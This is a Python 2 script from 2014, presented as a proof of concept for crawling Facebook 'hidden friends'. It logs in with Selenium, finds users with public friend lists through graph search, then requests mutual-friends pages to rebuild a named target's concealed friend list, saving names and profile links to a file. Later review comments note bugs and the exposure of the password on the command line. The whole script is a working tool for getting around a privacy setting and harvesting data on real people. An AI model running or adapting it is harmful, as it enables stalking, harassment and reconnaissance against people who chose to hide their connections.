opexxx

fb-hfc.py

Jun 5th, 2014
  1. #!/usr/bin/env python
  2. from selenium import webdriver
  3. from selenium.webdriver.common.keys import Keys
  4. from selenium.webdriver.support import expected_conditions as EC
  5. from selenium.webdriver.common.action_chains import ActionChains
  6. from StringIO import StringIO
  7. from colorama import init
  8. from colorama import Fore, Back, Style
  9. from pyvirtualdisplay import Display
  10. import lxml.html
  11. import time
  12. import re
  13. import requests
  14. import argparse
  15. import sys
  16. import os.path
  17.  
# Start-up banner and usage text, printed unconditionally before argument
# parsing. autoreset=True asks colorama to reset colours after each print,
# so no colour set on one line carries over to the next.
init(autoreset=True)

print "-----------------------------------------------------------------------------"
print "          Facebook hidden friends crawler POC - by Shay Priel"
print "-----------------------------------------------------------------------------"
print Fore.BLACK + Style.BRIGHT + "                    .@@@@." + Fore.RESET + "                         .:::,           :;::         "
print Fore.BLACK + Style.BRIGHT + "  lCCCf;            .@@@@.                         " + Fore.RESET + ".:::,           ::::         "
print Fore.BLACK + Style.BRIGHT +  " C@@@@@@t lLLL, tLLL,@@@@iCGL:   :fGGGf,  fLLf:CGf" + Fore.RESET + "..:::,.,,,.,::.  ::::         "
print Fore.BLACK + Style.BRIGHT + "i@@@@@@@@,l@@@; G@@@.@@@@@@@@@, ;@@@@@@@: G@@@@@@@C" + Fore.RESET + ".:::,,::::::::..::::,        "
print Fore.BLACK + Style.BRIGHT +  "C@@@C@@@@l;@@@l G@@C.@@@@@@@@@t.@@@@@@@@G.@@@@@@@@@" + Fore.RESET + ".:::,,::::::::,.::::,        "
print Fore.BLACK + Style.BRIGHT +  "@@@@.i@@@l.@@@f @@@L.@@@@ii@@@C;@@@C.G@@@,@@@@;@@@@" + Fore.RESET + ".:::,,:::, ::::.::::,        "
print Fore.BLACK + Style.BRIGHT +  "@@@@ ;@@@l G@@L.@@@t.@@@@.,@@@Ci@@@l L@@@,@@@G G@@@" + Fore.RESET + ".:::,,:::. ,::: ::::         "
print Fore.BLACK + Style.BRIGHT +  "@@@@ ;@@@l L@@C,@@@;.@@@@.,@@@Gi@@@i f@@@,@@@G G@@@" + Fore.RESET + ".:::,,:::  ,::: ::::         "
print Fore.BLACK + Style.BRIGHT +  "@@@@  ,,,. t@@G;@@@..@@@@.,@@@Ci@@@CfG@@@,@@@G G@@@" + Fore.RESET + ".:::,,:::  :::: ::::         "
print Fore.BLACK + Style.BRIGHT +  "@@@@       i@@Gl@@G .@@@@.,@@@Ci@@@@@@@@@,@@@G G@@@" + Fore.RESET + ".:::,,:::  :::: ::::         "
print Fore.BLACK + Style.BRIGHT +  "@@@@   .   :@@@f@@L .@@@@.,@@@Ci@@@@GGGGG,@@@G ....." + Fore.RESET + ":::,,:::  :::: ::::         "
print Fore.BLACK + Style.BRIGHT +  "@@@@ ;@@@t .@@@G@@t .@@@@.,@@@Ci@@@l      @@@G     " + Fore.RESET + ".:::,,:::  :::: ::::         "
print Fore.BLACK + Style.BRIGHT +  "@@@@ ;@@@f  G@@@@@i .@@@@.,@@@Ci@@@l fGGG,@@@G     " + Fore.RESET + ".:::,,:::  :::: ::::         "
print Fore.BLACK + Style.BRIGHT +  "@@@@ ;@@@f  L@@@@@: .@@@@.,@@@Ci@@@l f@@@,@@@G     " + Fore.RESET + ".:::,,:::  :::: ::::         "
print Fore.BLACK + Style.BRIGHT +  "@@@@,i@@@f  l@@@@@. .@@@@,,@@@Ci@@@t C@@@,@@@G     " + Fore.RESET + ".:::,,:::  :::: ::::         "
print Fore.BLACK + Style.BRIGHT +  "G@@@G@@@@l  ;@@@@C  .@@@@LL@@@L:@@@@t@@@@,@@@G     " + Fore.RESET + ".:::,,:::  :::: ::::"+ Fore.RED +"lilll.   "
print Fore.BLACK + Style.BRIGHT +  "i@@@@@@@@.  ,@@@@f  .@@@@@@@@@i C@@@@@@@L.@@@G     " + Fore.RESET + " :::,,:::. :::: ::::"+ Fore.RED +"llttt.   "
print Fore.BLACK + Style.BRIGHT +  "t@@@@@@i  .;@@@@i  .@@@@f@@@C  ,G@@@@@C  @@@G     " + Fore.RESET + ".:::.,:::  ,::: .:::,"+ Fore.RED +"ltttl.    "
print "-----------------------------------------------------------------------------"
# NOTE(review): both usage examples pass the account password as a
# command-line argument. Values in argv are readable by other local users
# through process listings and are normally kept in shell history.
print "Examples:"
print "1. Generates related public profiles:"
print "python fb-hfc.py -username <username>  -password '<password>' \n-query '<graph search query>' -output <output.txt>"
print "2. Exctracting hidden friends:"
print "python fb-hfc.py -username <username>  -password '<password>' \n-target <target> -profilesfile <file.txt> -output <output.txt>"
print "-----------------------------------------------------------------------------"
  48.  
  49.  
  50.  
  51.  
# Command-line interface. Exactly one of two modes must be selected:
#   -query  : graph-search mode, results go to -output
#   -target : mutual-friends mode, needs -profilesfile and -output
# NOTE(review): -password is a required argv value, so the credential is
# exposed to process listings and shell history on the machine running this.
parser = argparse.ArgumentParser(usage="-h for full usage")
parser.add_argument(
    '-username', dest="username", required=True,
    help='facebook username to login with (e.g. example@example.com)')
parser.add_argument(
    '-password', dest="password", required=True,
    help="facebook password to login with (e.g. 'password')")

parser.add_argument(
    '-query', dest="query", required=False,
    help='graph search query (e.g. "People That Work in Company")')
parser.add_argument(
    '-output', dest="output", required=False,
    help='File name to save results')

parser.add_argument(
    '-target', dest="target", required=False,
    help='(e.g. "text.example")')
parser.add_argument(
    '-profilesfile', dest="profilesfile", required=False,
    help='File name that contains list of profiles with public friends')

args = parser.parse_args()

# Rules are evaluated top to bottom. parser.error() prints the message and
# terminates the process, so only the first violated rule is reported.
cli_rules = (
    (args.query is None and args.target is None,
     "You must give atleast one method -query or -target"),
    (args.query and args.target,
     "-query and -target cannot run together"),
    (args.target and args.profilesfile is None,
     "You must provide -profilesfile"),
    (args.query and args.profilesfile,
     "-query and -profilesfile cannot run together"),
    # Either mode needs somewhere to write its results.
    ((args.query or args.target) and args.output is None,
     "You must provide -output"),
)
for violated, message in cli_rules:
    if violated:
        parser.error(message)
  81.  
  82.  
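def facebook_login(username,password):
    """Log the module-level Selenium ``driver`` in and return its cookies.

    Types ``username`` and ``password`` into the form fields with ids
    ``email`` and ``pass``, submits with RETURN, waits one second and then
    looks for two failure phrases in the page source. If either phrase is
    present the browser window is closed and the script exits; otherwise
    the list of cookie dicts from ``driver.get_cookies()`` is returned.

    The returned cookies are the authenticated session. Whoever holds them
    can act as the account, so they must not be logged or written to disk.
    """
    print ("\n\n\nLogin to Facebook...."),
    sys.stdout.flush()
    # Request the login page over HTTPS from the start. The previous
    # http:// URL depended on a redirect, which left the first response
    # open to on-path tampering before the credentials were typed.
    url = "https://www.facebook.com"
    driver.get(url)
    elem = driver.find_element_by_id("email")
    elem.send_keys(username)
    elem = driver.find_element_by_id("pass")
    elem.send_keys(password)
    elem.send_keys(Keys.RETURN)
    time.sleep(1)
    html_source = driver.page_source
    # NOTE(review): success is inferred only from the absence of these two
    # phrases after a fixed delay, so any other page (for instance one that
    # has not finished loading) is reported as "Success".
    if "Please re-enter your password" in html_source or "Incorrect Email" in html_source:
        print Fore.RED + "Incorrect Username or Password"
        driver.close()
        # sys.exit() instead of the site-provided exit(), which is meant for
        # interactive use; the exit status is unchanged.
        sys.exit()
    else:
        print Fore.GREEN + "Success\n"
    return driver.get_cookies()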
  102.  
def request_url(url,get_cookies):
    """Fetch ``url`` with the given session cookies and return the raw body.

    ``get_cookies`` is an iterable of cookie dicts, each read through its
    ``name`` and ``value`` keys. It is flattened into the name-to-value
    mapping that ``requests`` expects.
    """
    # NOTE(review): no timeout is passed, so a stalled connection blocks
    # indefinitely. The HTTP status code is not inspected either.
    jar = {entry["name"]: entry["value"] for entry in get_cookies}
    return requests.get(url,cookies=jar).content
  110.  
def graph_search(graph_search_query):
    """Type ``graph_search_query`` into the page's search box and submit it.

    Works on the module-level ``driver`` and returns nothing. "Done" is
    printed as soon as RETURN has been sent, not once results have loaded.
    """
    progress = "Searching for: \"" + Fore.YELLOW + graph_search_query + Fore.RESET + "\"..."
    print (progress),
    sys.stdout.flush()
    driver.implicitly_wait(5)
    time.sleep(1)
    # The box is located by a generated class name, so this lookup is tied
    # to the page markup the script was written against.
    search_box = driver.find_element_by_xpath("//div[@class='_586i']")
    search_box.click()
    search_box.send_keys(graph_search_query)
    search_box.send_keys(Keys.RETURN)
    print Fore.GREEN + "Done\n"
  121.  
def extract_profiles():
    """Scroll the current results page to its end and return profile identifiers.

    Uses the module-level ``driver``. Returns a list of strings: the numeric
    id for ``profile.php`` links, otherwise the path segment after ``.com/``.
    """
    while True:
        time.sleep(1)

        # A missing results-table header is treated as a rejected query.
        try:
            elem = driver.find_element_by_xpath(".//th[@class='_4311']")
        except:
            print "Invalid graph search query! (hint: first try it on facebook)"
            driver.close()
            exit()

        # Scroll to the bottom to load the next batch of results, then look
        # for the end-of-results marker.
        # NOTE(review): the bare except swallows every exception raised in
        # this try, including KeyboardInterrupt, and the loop has no
        # iteration cap. If the marker element never appears it runs forever.
        try:
            print "Extracting Profiles...\n"
            driver.execute_script("window.scrollTo(0, document.body.scrollHeight);")

            elem = driver.find_element_by_xpath("//div[@class='phm _64f']")
            if "End of results" in elem.text:
                break
        except:
            pass



    xpath_name_params = ".//a[@class='_7kf _8o _8s lfloat _ohe']/@href"


    html_source = driver.page_source

    html_lxml = lxml.html.parse(StringIO(html_source)) # parse the rendered page into an lxml tree
    params_result = html_lxml.xpath(xpath_name_params)

    data = list()

    for prm in params_result:

        # NOTE(review): re.search() returns None when the href does not
        # contain the expected delimiter ("&ref" or "?"), and .group()
        # would then raise AttributeError.
        if "profile.php" in prm:
            result = re.search('(?<=\profile\.php\?id=)(.*\n?)(?=&ref)', prm)
            data.append(result.group())
        else:
            result = re.search('(?<=\.com\/)(.*\n?)(?=\?)', prm)
            data.append(result.group())

    print "Enumerating %s profiles...\n" % len(data)
    return data
  166.  
def extract_mutual_friends(profiles_urls):
    """Visit each URL in ``profiles_urls`` and collect the friends listed there.

    Uses the module-level ``driver`` and reads the global ``target`` for the
    progress message only. Returns one flat list in which, for every link
    found, the identifier and the displayed name are appended in that order,
    each only if not already present.

    Privacy point this function illustrates: the pages visited are
    mutual-friends views, so a friendship is readable from the other
    person's side even when the target's own list is hidden.
    """
    print "Enumerating hidden friends from: " + Fore.YELLOW + target + "\n"
    data = list()
    for profile_url in profiles_urls:
        elem = driver.get(profile_url)
        print "Enumerating mutual friends: %s" % profile_url

        # Click the "more" pager until it can no longer be found or clicked.
        # The bare except makes any failure end the paging silently.
        while True:

            time.sleep(2)
            try:
                elem = driver.find_element_by_xpath(".//a[@class='pam uiBoxLightblue uiMorePagerPrimary']")
                elem.click()
            except:
                break


        # The same anchors are queried twice: once for href, once for text.
        xpath_name_params = ".//div[@class='fsl fwb fcb']/a/@href"
        xpath_name_params2 = ".//div[@class='fsl fwb fcb']/a/text()"

        html_source = driver.page_source

        html_lxml = lxml.html.parse(StringIO(html_source)) # parse the rendered page into an lxml tree
        params_result = html_lxml.xpath(xpath_name_params)
        params_result2 = html_lxml.xpath(xpath_name_params2)

        # NOTE(review): identifier and name are de-duplicated independently.
        # If only one of the two is already in ``data``, the other is still
        # appended, which breaks the identifier/name alternation that
        # save_file() assumes when writing pairs.
        # NOTE(review): result is None when the href lacks the expected
        # delimiter, and .group() would then raise AttributeError.
        for prm,prm2 in zip(params_result,params_result2):

            if "profile.php" in prm:
                result = re.search('(?<=\profile\.php\?id=)(.*\n?)(?=&fref=pb_other)', prm)
                if result.group() not in data:
                    data.append(result.group())
                if prm2 not in data:
                    data.append(prm2)
            else:
                result = re.search('(?<=\.com\/)(.*\n?)(?=\?)', prm)
                if result.group() not in data:
                    data.append(result.group())
                if prm2 not in data:
                    data.append(prm2)

    # NOTE(review): len(data) counts identifiers and names together, so the
    # figure printed here is not the number of people.
    print Fore.GREEN + "\nTotal of %s hidden friends have been found\n" % str(len(data))
    return data
  210.  
  211.  
  212.  
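def check_if_public(profiles,cookies):
    """Return the set of ``profiles`` whose friends page contains "All Friends".

    ``profiles`` is an iterable of identifier strings. All-digit identifiers
    are requested through ``profile.php?id=``, others as a path segment.
    ``cookies`` is passed unchanged to ``request_url``. Because the result
    is a set, the input order is not preserved.
    """
    # Two unused locals of the original (an XPath string and a compiled
    # regex) were removed, and the duplicated progress print was hoisted
    # out of the branches.
    print "Searching for public profiles...\n"
    public_profile = list()

    for profile in profiles:
        if profile.isdigit():
            profile_url = "https://www.facebook.com/profile.php?id=%s&sk=friends" % profile
        else:
            profile_url = "https://www.facebook.com/%s/friends" % profile
        print("Checking Profile: %s......" % profile),
        sys.stdout.flush()

        html = request_url(profile_url,cookies)

        # The classification is a plain substring test on the response body.
        if "All Friends" in html:
            public_profile.append(profile)
            print Fore.GREEN + "Public"
        else:
            print Fore.RED + "None Public"

    print "\nTotal of %s public profiles have been found\n" % str(len(public_profile))
    return set(public_profile)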
  239.  
  240.  
def generate_mutual_link(profilesfile,target):
    """Return one ``/<target>/friends?and=<profile>`` URL per given profile.

    Despite its name, ``profilesfile`` is iterated as a sequence of profile
    identifiers, not opened as a path. The values are interpolated as-is,
    without URL encoding.
    """
    template = "https://www.facebook.com/%s/friends?and=%s"
    return [template % (target, profile) for profile in profilesfile]
  247.  
def open_file(filename):
    """Read ``filename`` and return its lines stripped of surrounding whitespace.

    Blank lines are kept and come back as empty strings.
    """
    with open(filename, 'r') as handle:
        return [raw.strip() for raw in handle]
  254.  
  255.  
def save_file(filename,results):
    """Write ``results`` to ``filename``, truncating it, and print the path.

    The layout depends on the global ``args.profilesfile``:

    * set: ``results`` is read as alternating entries. Odd positions are
      written as "Username", even positions as "Full Name" followed by a
      profile link built from the preceding username.
    * unset: one entry per line.
    """
    # NOTE(review): the output holds names and profile links of real people
    # and is created with the process's default file permissions.
    paired_layout = args.profilesfile
    with open(filename, 'w') as sink:
        if paired_layout:
            for position, user in enumerate(results, 1):
                if position % 2:
                    # Odd position: remember the link for the name that follows.
                    if user.isdigit():
                        profile_url = "https://www.facebook.com/profile.php?id=%s" % user
                    else:
                        profile_url = "https://www.facebook.com/%s" % user
                    sink.write("Username: " + user.encode('utf8')+"\n")
                else:
                    name_line = "Full Name: " + user.encode('utf8')+"\n"
                    link_line = "Link to Profile: " + profile_url.encode('utf8')+"\n\n"
                    sink.write(name_line + link_line)
        else:
            for user in results:
                sink.write(user.encode('utf8')+"\n")
    print "Saving results to: %s\n\n" % filename
  274.  
  275.  
# Script entry flow: copy the parsed options into module-level names (the
# functions above read ``target`` and ``driver`` as globals), start a
# virtual display and a Firefox driver, log in, then run one of two modes.
target = args.target
username = args.username
# NOTE(review): the password stays in a plain module-level variable for the
# whole run, in addition to being present in argv.
password = args.password
filename = args.output
graph_search_query = args.query
profilesfile = args.profilesfile

# Fail before starting a browser if the profiles file is missing.
if args.target and args.profilesfile:
    if not os.path.isfile(profilesfile):
        print profilesfile +" file doesn't exist"
        exit()




# NOTE(review): the virtual display started here is never stopped anywhere
# in this listing, and every exit path calls driver.close() rather than
# driver.quit(). Confirm no display or browser processes are left behind.
display = Display(visible=0, size=(1600, 900))
display.start()

driver = webdriver.Firefox()

# The empty dict is overwritten immediately by the login result.
cookies = dict()
cookies = facebook_login(username,password)


# Mode 1 (-query): search, collect result profiles, keep those classified
# as public by check_if_public(), save, exit.
if args.query:
    graph_search(graph_search_query)
    results = extract_profiles()
    results = check_if_public(results,cookies)
    save_file(filename,results)
    driver.close()
    exit()


# Mode 2 (-target): build one mutual-friends URL per profile read from the
# file, collect the entries shown on those pages, save, exit.
if args.target:
        profiles = open_file(profilesfile)
        results = generate_mutual_link(profiles,target)
        results = extract_mutual_friends(results)
        save_file(filename,results)
        driver.close()
        exit()